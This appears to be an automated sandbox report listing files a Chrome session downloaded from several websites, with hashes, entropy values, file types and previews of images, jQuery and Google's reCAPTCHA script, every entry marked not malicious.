                                              SHA-512:819A075E8E222D5081C734C4BEEE5559481D907A748A6B48AACC6EF9B8C835B25576CAC810AF0DC077C968C839FA0103B1FD748BA830CDB0CE5A58D8371905B3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/6/f8dd4bffdef039afd52cc92797706540.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 8..../...*....>.d.P)%24.S,...dn-.^.`....qb..9[..........T.%.nv.A.3.OX.8..z<.P.G.7g........._.>..?U_.xK._...:..c.'..]?......................w=..U.......c....[O[/........_.......?.....~._.>...=.:....G...{......._..MS~..G.?..6~....O.w...~....Z.._...|..........~e...D.?..`....?y.........7.ob_.............X.R*....#0]+.+..:=,...wk...|.....B.p.5U[D.....+..9s.............R...[.x0....(h.q...x..N.C{.X2<Wy.........:gn<..L..........~..o.h.@......! \=f..G...vDQ...y..5.f.c......O.....LN#.......==+......t#.fV..[yf..m.rY....*#.2..33..N.....5........I3=6..!o@D..+).....,vA..Mg1.d.>:sp.....MW.....9)..=.'.9.....V.E@...$Rd...k........Q...u.p$6.)...Z".."..m...]@nwO..p\.1. (vS...S.>.)...........>.....B......(.F.i..V..$.@v.."..L;...zU...,. W..FY`.L...*...#./....t....wDq...CR....s....i.@...-.C.r.._]).]x..D.rpnVO0(.~.... r...>.ep....5."5..-y..~..y|.Q.....P.r.V.,.Y..QT4...;./^......|.i$....,..r'..5.[......5.s...D..6...`..LTR...V.h..T.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65447)
                                              Category:downloaded
                                              Size (bytes):89501
                                              Entropy (8bit):5.289893677458563
                                              Encrypted:false
                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/jquery-3.6.0.min.js
                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4880
                                              Entropy (8bit):7.937068265130278
                                              Encrypted:false
                                              SSDEEP:96:q5biEAUT6XtohNEoHdq2lmDjgmVcNbE03BFeqXv3Sl+:q5bdcdsNEoHdq6mDsIchZ3WC3Sl+
                                              MD5:581448FD68DF3124D4B888B42ED46404
                                              SHA1:16AE28E566CEF7184B3608ED90C7E4A78A48F0DB
                                              SHA-256:A36D526E51EF75AAC8982AFEE30417CA0C3E9E2C8D021F85F1DF7989936ED554
                                              SHA-512:A95B90EBFA2DB9B72B519E1C4551646C785B8DB9EC2897E3CD007A50CE83FC4E81984241A5990063E0A67FC7F9026110C8A7461878D098930F9C07B27A07C46A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/procurement.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE........h.................n.................................................l...........X.............................../.......................d...q..n.......6.al...................,...........^.p............T..... .........?......|..................w>..O.#pio.....E.aG....-g]dS.......-Q.*.BQ........;......d.....kF.#.....t..y.a..ZC....}..n...}p}.....i.........m`..W.wgzeXs..g..#ylf....U....jrX.)D........Tb..l[R[.$...l....!..ra.8.....A.V.......m............t.NI..XO.1......n.J......|.b.=...s..y.....J.t...q`O.xN..-xi...Z............'...E{.9....U..Z.....v.\..=..{...Q.....R..Y.......[.<......M...LIDATh...k.....1.4.3..8&....5....:...Q..U....!..4.4.%.)......5.$.-.B^.@^5l...o....t.3j.......:...y.9..12.......:..+.4]..je+n#I....Uv."d8NX.D.......F.....ZG...N .@.4A2d...%.@B....p"M.w.@3B. .v.H...+<..|.P8>).Vu..".wIR'....l.p.......z.ru7..&m..3.......|...,'4...@t.c......,..,.A,.;..4M....0...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4564
                                              Entropy (8bit):7.929284237616848
                                              Encrypted:false
                                              SSDEEP:96:FxsqUkBlZB8V3lmoC8BDGUgLm8o0p4Oi8qoLeWxxNGJ7qdoxZ:TsqH/ZKJ0oCUD+m8o0pC8qixxMJ7qd+
                                              MD5:E643D9A7952D184C3AAC1FDC6EBD5AF6
                                              SHA1:9FE91330A4D31A5B2F66A5E6DE14D763A75DCB59
                                              SHA-256:84F7D71ABCDC247AEC2AA01EBBC36AFE699D6F13AA53AC0F233081390294F93C
                                              SHA-512:1CB161E3ECDC4F9351EC5C2E2C1FE568120796C13C78B53D22F001C309D44DFA6980D5E817B9C359CCBF322754FEDA65D92C95FF4424FBDAD692C55320DA313C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/Optimizely.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.........................7....9..3...........<..5...../......................=.}....9.................8.............6.z.}..x..+..-...........&.......-.~@.~......"....-.3.C..........M....f.....p........<Y..D...._.v....)....6.J..(M.Fe....?...t....................c/.{...}.............5....7.t......I+..w....."D..3.Y.........t..."....]z.......m..O..Q.>......K..v....gm.......2J.{...........Oj`^....IDATh...O.Y....\....s...... ........_.f[)`.Rc[4M5.I._..........vW.9.~.........Mh...-..B.DVj.Y...sU.Y...40x....a..<.]...6D....-..F{v`...&...........I"/K..9...?...v}^.'.PNf.5;.7..."^...s..r.......J.{.9..;...d....Y#...!..DW{;..Xz..99D3.K..^$.q..Y....Ad...q3=..3'.P........d.02....d..w....SurHV.>t.q.c.x.$..(M..q...d`.c"O.aT.].6...I.....h....s.(.O.h.. I$..'...rG.v....d..|...r.......@..G*rR.? %..w.....;.H....D.f....%.9..!..|tV+&.P,....jY..\.7..R..B"i.1....xS.........@..q.c..B..w>....U.M.a{.v..i...v.&Q....T:....Hx;.I5.)
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 914 x 716, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):30889
                                              Entropy (8bit):7.935641229650575
                                              Encrypted:false
                                              SSDEEP:768:hOE3x2UymWHWEys9jH9Gl+rXg6Q4dBT+840ALvrr:hOyGiRs9jHfQA+Rxj
                                              MD5:F0AA43488EA16B18324764A63D76ADCF
                                              SHA1:2C0C6A8602F53382336EA8725448E1E61F356A7F
                                              SHA-256:185FA09861D622207376C9BCD642015B859AA6EA58FBC0D15377BB781D920792
                                              SHA-512:9A2105066EFBB1F37F393EA8459908515CFC6B51C500CF56AA0A13297927B849CB4F8D3575F8AFFF0A6C76521109E46EBEEFBF2BF29451201FE02BCA296C87C6
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/menu3.png
                                              Preview:.PNG........IHDR..............\}.....PLTELiq*9A...... 5>$7?$6?&9=%7>#6>......GW[ipr............N..................w.Z.......&&&...PPQ.....@i0.pqr.... <<=...ghi..........!,2._`a...k.s..K..b..........tRNS.2...;+..!..Z.3=.....pHYs............... .IDATx..].{.8.....m.z.L.<(.....v....}$..........6F....F..a`````````````````````````````````````````````````````````````````````````````````````````````````````````.R..l..V..h...ff.?.f..l.D..7.`.X7G.J.mi.J.5o..4X.V..B..J.mY[K.^$..d.7*i.4.1uy]9>.......uu.%.>........N.......q.Jv}.9g.lf..:..H...T..o.....o.}U.?4.....'.`....}..{N.J......B...AV..?.|....w...._...L./_...V..f.6.oV.............S.B.Y,..r...u.b,}.%.....L......._.r1.CW%...|....%T30.5....?.......d.#b..5.../...!J....~<...=..C.."._=.E.......|h...%!...7...GQ....J.q..o.,.hx.v.m..-....%..`.....zh...}.M...H......5s..B!i...B..#eW........_.......|......IB=..?....9.<n....>%....;o./.9yQ..........bn..&.............|C..<5...c........."..v..Bj1.o_.M.Z>6.3.../.......?..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x480, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:dropped
                                              Size (bytes):38794
                                              Entropy (8bit):7.995088016296909
                                              Encrypted:true
                                              SSDEEP:768:4g+atA413jHA/xq/CQIrBvqX7HeSGSp86G7vpRFG3nIRwnY0l:/+atA4tAZjQ8xSAvFyCwn
                                              MD5:727F41D43EF0BB64720BE6682D24F443
                                              SHA1:F8ABE070C14B2FC2BD5B1102BEEB700730567082
                                              SHA-256:E1938D0E7762704E8D69EE8633BC0B3EBBFCA67A71D20DAE4F110BA2BCEFAC79
                                              SHA-512:F94959C3950AC3318E6508B781258EC82408736BB4F0B7A1054C440AAFB1A7B13ADC406162C27AC2F5818AD58661660478A1DA821098F630943EE439231DCC5B
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8 v........*....>m2.G.".#..:...cK.r`yw.8.8g......?..o.~.G...)}..o5.{.......~.....~.z..........P............P.....+................K.?..?.......$...'..B..~=.?.Oj.....S.....>.~A.......w.....c.-........#............<..[.w...7._.|+.w.......O...=.?............?.....{s...c.............&(Q..51o$..5..-.F..xg.....5......B...=,.,.1r.V.O.V..=zm......9.M.1.]+l<Uk]@......9..0C..k........F_)...m...OC.5..L[."...]..{.8..Pz.y?+.;)....P-U.'9D..@d"...PCA...,.m.~e...`...bx..9....f.\f...).z."B...(\..@......|k%.5e...=a..9.h...f...Y.Oa_.p.V...!..7VS.s.'. ..{........B...o|2.....y...47w.t..-...4...@..Rr.'..]....H...?.m<<o.D......I.Mm.oS}....f.KI. ../,..K...iq....S@]..tSxrg..[.g......]X.... l......%..6.^....oGe..~..U.}.2./X.q. ..9GA,...N..o...Q........u.3e"k.:..f)#M...<.r..Wj3m}..C5))...k.2.'.w=.Y..C}E..#.X........x.J."D.v.5.. .\..5.l.RI....2....5`.Sqa.G..o.bSs...c..oc..p.g.st.....hhqW..q......99h.?.'..t^^..u.).HO.s.P.8.'($i...A.....)..M.N5..s/(Dc..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (724)
                                              Category:dropped
                                              Size (bytes):551834
                                              Entropy (8bit):5.646059185430787
                                              Encrypted:false
                                              SSDEEP:6144:ytxIUYTteVvs0E8gSdoxS4MLYw1tZnAzsz1I9VBojCdzNDC2vPpD:ybYTZMgGopkAzsz1ciEU2d
                                              MD5:33AFF52B82A1DF246136E75500D93220
                                              SHA1:4675754451AF81F996EAB925923C31EF5115A9F4
                                              SHA-256:B5E8EC5D4DCC080657DEB2D004F65D974BF4EC9E9AA5D621E10749182FFF8731
                                              SHA-512:2E1BAAE95052737BDB3613A6165589643516A1F4811D19C2F037D426265AA5ADF3C70334C1106B1B0EEF779244389F0D7C8C52B4CD55FCE9BAB2E4FCB0642720
                                              Malicious:false
                                              Reputation:low
                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var z=function(){return[function(v,p,K,u,W,n){if(!((v>>2&(n=[6,"Unknown format requested type for int64",9],n[0])||!U[22](11,this.U(),p)&&this.dispatchEvent("enter")&&this.isEnabled()&&R[23](n[2],this,2)&&R[3](n[0],2,!0,this),v-1)<20&&(v>>1&7)>=4&&(u=new vf,W=R[41](1,p,u,kV,K==p?K:P[8](37,K),5)),v<<1&11))throw Error(n[1]);return W},function(v,p,K,u,W){return((W=[17,7,46],v)<<2&W[1]||(p=function(n){return K.call(p.src,p.listener,n)},K=UJ,u=p),(v-1|12)<v&&(v-9|59)>=v)&&(u=M[W[2]](15,p)&&!M[W[2]](13,."iPod")&&!M[W[2]](W[0],K)),((v|8)&W[1])==1&&(u=p.Y?p.Y:p.I?"application/x-protobuffer":""),u},function(v,p,K,u,W){retu
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):21012
                                              Entropy (8bit):7.806426193294855
                                              Encrypted:false
                                              SSDEEP:384:4YNg7NQIN85aD5mGuiO+dWHIEJOVtEZ0PjyzBAJkGDqO8VHG+Pi4P4//9:4Yyti5aQGuiNWHD4IZ0ryNAJkGqOqmI4
                                              MD5:2D45EBA86D050FB444DB0F037C70AC0C
                                              SHA1:4382546BC05E00A9326151CE829D048AD6CEB16F
                                              SHA-256:A1AC7A50432594083812B7E94BBD409EC35510E889CC447A2B8DF630B68D9291
                                              SHA-512:2599D72338C9304F933F6FDF56B64CF224BFC7E507094F5C5B2AF707E11DBD37122EC318DFC3E121A37E3D1B90036A49A32300C2C5E809ED75D6BDC1F716870E
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4269
                                              Entropy (8bit):7.9432018920833976
                                              Encrypted:false
                                              SSDEEP:96:b4CPVcWY5PI/RNPR77QNF/zhG3v1n9U5Ph9r7HUT7+u7Ba:sCG5sRYwR9U5Pr7HkpBa
                                              MD5:396B234784CD89BAA02C6541E220E261
                                              SHA1:32FA111FFB0F8DC325ABADA51605D186AF5FC6EB
                                              SHA-256:8A6DA96AF9C182FA695E23D7AAAF7930FE6A6548C78B4476E09C3D1E583260AA
                                              SHA-512:49C16EDC8FAECE13B264DE01B737D6326E8BBDE9F6900735B56E23BFF6D707319EF906416AC4328CB31F06C9931196280EA942675CF5804F3EBBE65932B24F50
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/web_3.0.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...}PLTE..a..a{.]..Y...............h.D........e..W..]........a............f.K....i..z........b...b.<b.AI.......W.....m..^|.f.O.{.[..h......x.R.....~.P.......M..U.w.l.j.0..z.]...R.w...e.t.G...s..a.....r.....Nt..m.J.I....W...Z..X.B.f.....}.EW..C.3.t... r}..n.c.;.........S......n.^G.~.K..V.O..&...3M..=.......D..'......2...*|......T].Z(.......l..j.....`..;..d....k...........x.Ft~..(....IDATh...W..... i.IH...Q.Ubx.P#.(o(..".D..L.j...jm;........w....i........:F..z.hjj.5e.V....!.&&&\.,...#paj...zT.........j..`...Zmr.59i9.......L>.f.#.......w9..\..k|l.611C.L.Z...>=}`}.......6CL../.&...X........'.....(._..@#.B...u...0...i.-.4...`j.. .ZH..6k..G.D...{.[3..D.v.....k...e.K.c.`..GM.........q.5...o....#...........M#....B..h...;..9. .".!.u.Mi........S..(.1....Qxf&..|>.....@.........*?.i..._.6p8..^...k.].{~.......<;.........P.l..#.O....z.C...0m.f..h4.~....~.....)....}....K..A4d....A.}p.....*.11*..A...i.~x....?z.c^....kX..}.6...7....Mr.{G...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):53884
                                              Entropy (8bit):7.9962239420642325
                                              Encrypted:true
                                              SSDEEP:768:298mD1MGEKugZVz26MQZhEblmkPc0elErloqwU9Ez+/K80slTKF2UkZKnDXvyy2c:48mD1MYlvemkE3yPh/32sk2AcGP0I
                                              MD5:995BA9BC493346488539C1089EC9CB46
                                              SHA1:1A39A0B3F5C0B904428332D77E285866734857CF
                                              SHA-256:3BF0981939D17C0CB098ED5450961A84731F5D61FBF7F4E1520A4483E18B7C3C
                                              SHA-512:1A902B65C90998AFC43692780BE37117D3C76D6B626860BE605B620F23EADB294F2E0B7E8F4D2E853F17FF6496424B2F65FA135B52A90C8D137CEB7007775FEB
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/28/d42724b6981b1026789790a7700c638e.webp
                                              Preview:RIFFt...WEBPVP8X..............VP8 .....5...*....>.p.S.&/0..Y....ens.[............M.Gz....^......._..`.....S...1..........<.....v..h....k~.._.....z....c/.{........z.............K._........z........K.G._./.....?....~.,.........;.....6...?...............o..n..|....OA...{ze~ot.....;...&~................a_.....?j.....C........Z.....u]h<.Q(.j.....3..........i..V...^...F".[lQ..i.C....<...o..4.`..l.S..*<b..l2...ua.......-./.$IE..dZ..>0.p.E..=t..T...)^...3..+|.pv!m...EM..8@.j..p...6f.-....~..2IC.....y....x|k.w.(...v.P.L.%tb.\...Los.4..KIR.T]e.}j(0G-.1RQ..-.p..)o.{..rQo.)E.W..b.Z..E..}@...{y....s....[....v.|.p.....r.k^..7.....J4[.U@......Y[k n..B..$0%'n.J>k}.I........?..{.......V.=.._.r.N.%x.w.~..}...F.P.bm@..F..OA..W..Ta...ct......V...C7...B.....)'....C.fW.M-. .yQ..(......S.........b@..z..g..R"."q.'.F.......Y.K~}J.%i.R.o.9f.....&./.)>jG.r..z.!..!.?.........;.1.<.M.....(.....(iB.}z..=n.3.|[.......V.....Jn..(....X..(...0...r..P....t....[?...ua+#..!..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3274
                                              Entropy (8bit):7.929862262138715
                                              Encrypted:false
                                              SSDEEP:96:hpxH95oBLFGfJueu6Rrmx/Oj9J5kFdoWBFOI2uaz:7xHzcyHQOz5kboN4az
                                              MD5:6CD1D31E708884FD2A0A827E7C683396
                                              SHA1:33B2DB1F35BF1A3752EF6715733CFC86A080AC58
                                              SHA-256:465E45BE85EEC94F3291D29E85EE3E9DA1B13DF14B9A2B8EB729F0250609B4F3
                                              SHA-512:DED12289E4341117BEB8CB7D4220F993B18D5047E53ECC017C7C4BC336413DEB64F17FF0956125573439D986EF9714B6DBE6C4B5BE0443B647E8C3BA03139F34
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...NPLTE....{..{.....s..r..y..x........y..t..U....z..p.....y..5........l....<......&}...7IDATh.Y.v.:..+.,..........r..W......H..U.u.T..?\.L.8.....NK.:~..;....~...\V..j.i...c...yn....v..J)...........E..k...K.U6.A...,...+.ajUV'.`.....S9X..u.h.l....w)..Z7Mz..........Ux._.2.../..A.+.....7.K.x8n.`Cr.J...f..e...\R.e.b,..i...H....v8..].p.....R.A.*../,....yz[.nX....tu.Y`h..mI.o.....{.y...9..K.+..~.4....`r?..i.o_.6.&V................_.+....3x.{.!)...w.v....1.A.X1.H...!..I..~....[.<._......1..c.....c..M.C5.G.#.j.Y...6.....>k.3...{d]lG.......c..2t.*.C....n~..yS..D...[.v..9...h....W~_M.........4....B./..)(.WT!..Q6......8.oZ F.....q..Q..Z.2....hm.:(.u......!$&..g.%)..xs\\Bye:..n..4.O..M.FV.v..W...Ec.~....-@.;.dS....sO......r..G.B%T.x.p..m9.v....4.*;..9}.<G...&w.j..}..%[a./.3z.}.|.......^....#6.&F..d\.o...n......Z.....%|......KJ..XX....3,(..&....e)......nn....FGd..)."u.w...(...s...Mnnn4d.4bB.*.>-w........Xg.e~.2..Z.?
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x480, components 3
                                              Category:downloaded
                                              Size (bytes):71185
                                              Entropy (8bit):7.983687439159336
                                              Encrypted:false
                                              SSDEEP:768:Y81BlAoXzD/z179/hVwho4OYiXK6Pmj6Iu924FZxQZ1HT72abs2YHkzZTvpntlpv:YO/z3/hVwKZ2WmjdubFZGZh7rbKMTSAj
                                              MD5:E7CF6E022BA22E7BB0448673997E9A04
                                              SHA1:3528969B7D284CC524A05121E146123D17CD1782
                                              SHA-256:48D437218DADB916B022215CC03AFA61B3EA0B5FFAFA6A61D3A2E755B1FD709E
                                              SHA-512:2B70E89736282DE36F4BE4FB49726C00D216BBAC941F083E7415F4F02FBC4E61467C8ECC91C1221BF1A69D7F75A16CF76B538EBA6675456A0CA529B23636A758
                                              Malicious:false
                                              Reputation:low
                                              URL:https://i.ytimg.com/vi/LiEQ_JV0h4w/sddefault.jpg
                                              Preview:......JFIF..........................................................................................................................................................."........................................S........................!..1AQ."aq.2...#BRb....Tr.......3CS.....$s...Dc...4.d..................................?........................!1.AQaq."2..B......#3Rb.r....$C.....%............?.....~I..._.....~K..._....-[.[.db<T..l'.o.E.k.._.p.....Z..8$.x.3.._.p....?.._.p.......8#..?.._.p......l/.o.E.jk-+-.G.b<T..[......~...l/.o.E.jl-t-.G.b<T/.W......~.P.L'.o.E.jmV..F..&#.A...~I..._..7O..&...~...J.F..F#.A...~I..._............O,t...-..G............-wC..&..x..X.)k..[...._........_..7?.....x..X.)k..[....^]...G.../.K........?..+.-c..x#...sp_..?w..R.s0_..?w..U.GKX.....x...f..,'....X...XO...b.JT..x#...x/...C.)cr._.a?v..U.%,%.[....Z........?..7'.....h..Y.R.Q.....U..8....C.+.r0?..?v..U......x#.._...8?.....F..............x%.x...|..8?...........h..Y.W{:0..\G...A.?....v..W..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):11256
                                              Entropy (8bit):7.521185189967952
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwJ+hOLl2vO+livdOSk5HmCr4x8qCoRjREGrqa:4YNg7JfQO+IvdMQy1qCIjREuv
                                              MD5:87D8BCF63B9F9D08C2D8D2BAB4C044F3
                                              SHA1:D7D5790031027566438F5B70551C642CDD6E0AB7
                                              SHA-256:1E2E317303D0C4E000359EA0237D8C967606868A575E8F1AF3BCBC3CDBD3ADD9
                                              SHA-512:37C0282987E7D33D472DD758F9EB70C6EFC037B2D8174FFA0BFEC58F15ECA480706061D9FABBF8F0921762AF9BA6C6887C8E1FABDE652970AA9F124D4A0C2658
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6585
                                              Entropy (8bit):7.964245268395849
                                              Encrypted:false
                                              SSDEEP:192:BaJS0Q9u3GPHZz7HWMrDwKlluY3VXWbtAy:EJl85zykwKllb3VGbuy
                                              MD5:1088D05881DF1BCE499F9FA184BFC4FD
                                              SHA1:BBA7126B468FAD2B58353BC4D09A6CC36B7F0A48
                                              SHA-256:4579BB153E2FE5D136A586583AC70DC42A0F99895615B88B83788D397E95B766
                                              SHA-512:9D55E067813E0141F9D36274A286E86A0A2352DA65352C7E4900A7FD4B943D95E7E2736E8C4777E8C434DFBC7976589CCB77CA6932DB037B825E280CCBCC63A8
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/ssl.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...=PLTE.............................................C...........8....................6..2........................9...}..............K...............G................?..8...............x........;...k..{.......................4..........!......m..<..*....x....,..T......|...z.......4t.............|..........c....................[....uC..(....Q..2...wq.....H....).....+...1.................'......f;.............T....n.-w..gy~.._...a....~.!............]..d3........P...}......F.{..it....K..M..].qE....7.4.....D....q..s...G.....z..|B.Y#...."...7IDATh...O....\.{`.....r.3..$..i..2.6........6m...5ib.a.........v.j.6.....P..MN\.##...g=k....71BB*.)...B*.._...T!|).I....~7!R..d..P#.G..p.h....\..-"+...P(.........Ex".....7.....Q...3.-....&|.d..G...|#...'..1'.^..u. *....!..T...NA.A.Ih.Ja#.4..Q.t.z.T8...'..L.5H$.~D.W?$...Ne.eb.M.*R.ABiHx.*.Ea...T...^.+...@.... .(.).S.7.M.UD..bNe..h.....%1.'....%.....P.\&?F...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (724)
                                              Category:downloaded
                                              Size (bytes):551834
                                              Entropy (8bit):5.646059185430787
                                              Encrypted:false
                                              SSDEEP:6144:ytxIUYTteVvs0E8gSdoxS4MLYw1tZnAzsz1I9VBojCdzNDC2vPpD:ybYTZMgGopkAzsz1ciEU2d
                                              MD5:33AFF52B82A1DF246136E75500D93220
                                              SHA1:4675754451AF81F996EAB925923C31EF5115A9F4
                                              SHA-256:B5E8EC5D4DCC080657DEB2D004F65D974BF4EC9E9AA5D621E10749182FFF8731
                                              SHA-512:2E1BAAE95052737BDB3613A6165589643516A1F4811D19C2F037D426265AA5ADF3C70334C1106B1B0EEF779244389F0D7C8C52B4CD55FCE9BAB2E4FCB0642720
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/recaptcha__en.js
                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var z=function(){return[function(v,p,K,u,W,n){if(!((v>>2&(n=[6,"Unknown format requested type for int64",9],n[0])||!U[22](11,this.U(),p)&&this.dispatchEvent("enter")&&this.isEnabled()&&R[23](n[2],this,2)&&R[3](n[0],2,!0,this),v-1)<20&&(v>>1&7)>=4&&(u=new vf,W=R[41](1,p,u,kV,K==p?K:P[8](37,K),5)),v<<1&11))throw Error(n[1]);return W},function(v,p,K,u,W){return((W=[17,7,46],v)<<2&W[1]||(p=function(n){return K.call(p.src,p.listener,n)},K=UJ,u=p),(v-1|12)<v&&(v-9|59)>=v)&&(u=M[W[2]](15,p)&&!M[W[2]](13,."iPod")&&!M[W[2]](W[0],K)),((v|8)&W[1])==1&&(u=p.Y?p.Y:p.I?"application/x-protobuffer":""),u},function(v,p,K,u,W){retu
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):64982
                                              Entropy (8bit):7.996470828693687
                                              Encrypted:true
                                              SSDEEP:1536:4UISOseBOHWZWy3WkQDG8x1SdKUEyDuAg7UsMm241:nIjSRy3Wk9sS+h2w
                                              MD5:AE0213133370A1C2A436C4CBCE385B6C
                                              SHA1:F021C2080E52C6350D2BE66586BC3E4B9D8E73B7
                                              SHA-256:3E2F16947C0B155A83CDE9ECF72F9E6783D1BA0FD7C73896F5A76CDB8A0311E4
